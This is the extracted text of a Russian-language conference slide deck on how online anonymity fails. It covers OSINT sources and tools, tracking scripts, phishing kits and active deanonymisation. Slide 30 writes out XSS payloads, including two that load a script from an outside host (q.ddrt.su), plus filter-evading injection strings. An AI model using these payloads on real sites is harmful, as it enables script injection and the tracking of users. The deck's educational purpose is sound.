Документ обсуждает важность открытой разведки (OSINT) и указывает на то, что люди часто сами несут ответственность за свои проблемы с анонимностью. Упоминаются различные источники информации, такие как социальные сети и поисковые платформы, а также методы социальной инженерии и фишинга. Автор подчеркивает, что использование OSINT может быть сложнее и интереснее, чем кажется на первый взгляд.

1. Анонимность
все дела, почему её нет
и почему вы сами виноваты
Roman “deadroot” Ananev

2. Дисклеймер
• Исключительно в познавательных и
образовательных целях
• Все, что будет сказано, это чисто мое мнение и
никому навязывать я его не собираюсь, так не
надо тут потом это того :)

3. TL;DR;
• OSINT
• XSS + phishing
• Вы сами виноваты

4. Open-Source INTelligence

5. OSINT
• Поиск в открытых источниках
• Социальные сети (fb, linkedin, twitter, instagram, vk,
google+, …)
• Мессенджеры (tg, messenger, viber, …)
• Форумы, сайты, блоги
• Поисковики (Google, yandex, …)
• Формы восстановления паролей
• …

6. info@nastachku.ru

7. vk

8. vk

9. fb

10. ¯ _ (ツ) _ / ¯

11. но можно было и проще

12. На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo bing
phone number
linkedin
@email
twitter
facebook
username
pastebin

13. На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo
bing
phone number
linkedin
@email
photo/images
twitter
facebook
username
IP DNS
pastebin
domain name
news

14. На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo
bing
phone number
linkedin
@email
photo/images
twitter
facebook
username
IP DNS
pastebin
domain name
news
satellite
video
documents
crime data
VIN
forums
games
archive
periscope

15. На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo
bing
phone number
linkedin
@email
photo/images
twitter
facebook
username
IP DNS
pastebin
domain name
news
satellite
video
documents
crime data
VIN
forums
games
archive
periscope

16. Вычислю по IP!!1одынодын
Censys
Whois
Shodan
Bing
https://inteltechniques.com/osint/

17. LinkedIn
https://inteltechniques.com/osint/

18. Имя и Фамилия
https://inteltechniques.com/osint/

19. Номер телефона?
https://inteltechniques.com/osint/

20. Email
https://inteltechniques.com/osint/

21. Username
https://inteltechniques.com/osint/

22. Documents
https://inteltechniques.com/osint/

23. Twitter
https://inteltechniques.com/osint/

24. На самом деле OSINT сложнее
и интереснее
если ты не ленив :)
https://github.com/jivoi/awesome-osint
https://github.com/sebdraven/OSINT
https://github.com/ilektrojohn/creepy
https://github.com/pirate/mesh-networking
https://github.com/automatingosint/osint_public
https://google.com

25. PPLSrch

26. Активная деанонимизация

27. не совсем OSINT
• Поиск в прочих местах, но тоже открытых
• Фишинг и активная деанонимизация
• Взломанные базы данных и утекшие данные
• Газеты, журналы

28. BlackMarket

29. Социальная инженерия

30. XSS
• ">')&#34&#62</stYle/</titLe/</teXtarEa/</scRipt/--!><img
src="0:0" onerror="(function(u){var
d=document,s=d.createElement('script');s.src=u;(d.head||
d.documentElement).appendChild(s);s.parentNode.remov
eChild(s);}('//q.ddrt.su'));">
• ">-->'></script><script/src=//q.ddrt.su></script>
• <!’/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/
Onfocus=confirm`1`//><Svg>
• <iframe/src=javascript:
%2561%256c%2565%2572%2574``>

34. http://samy.pl/evercookie/
https://github.com/Valve/fingerprintjs2

35. De-anon? Easy!

36. SNdtctr

37. Phishing
https://github.com/gophish/gophish
https://github.com/wifiphisher/wifiphisher

38. usine$$
https://www.secureworks.com/resources/rp-2016-underground-hacker-marketplace-report

39. usine$$
https://www.secureworks.com/resources/rp-2016-underground-hacker-marketplace-report

41. Apple, Google

42. Analytics

43. А на самом деле вы
виноваты сами :)

44. http://imarker.ru

45. Что с нами стало :(

46. JS, Flash, TOR, VPN, …

47. Telegram: @deadroot
Остальное найдете сами, если надо ;)
Roman “deadroot” Ananev
Simtech Development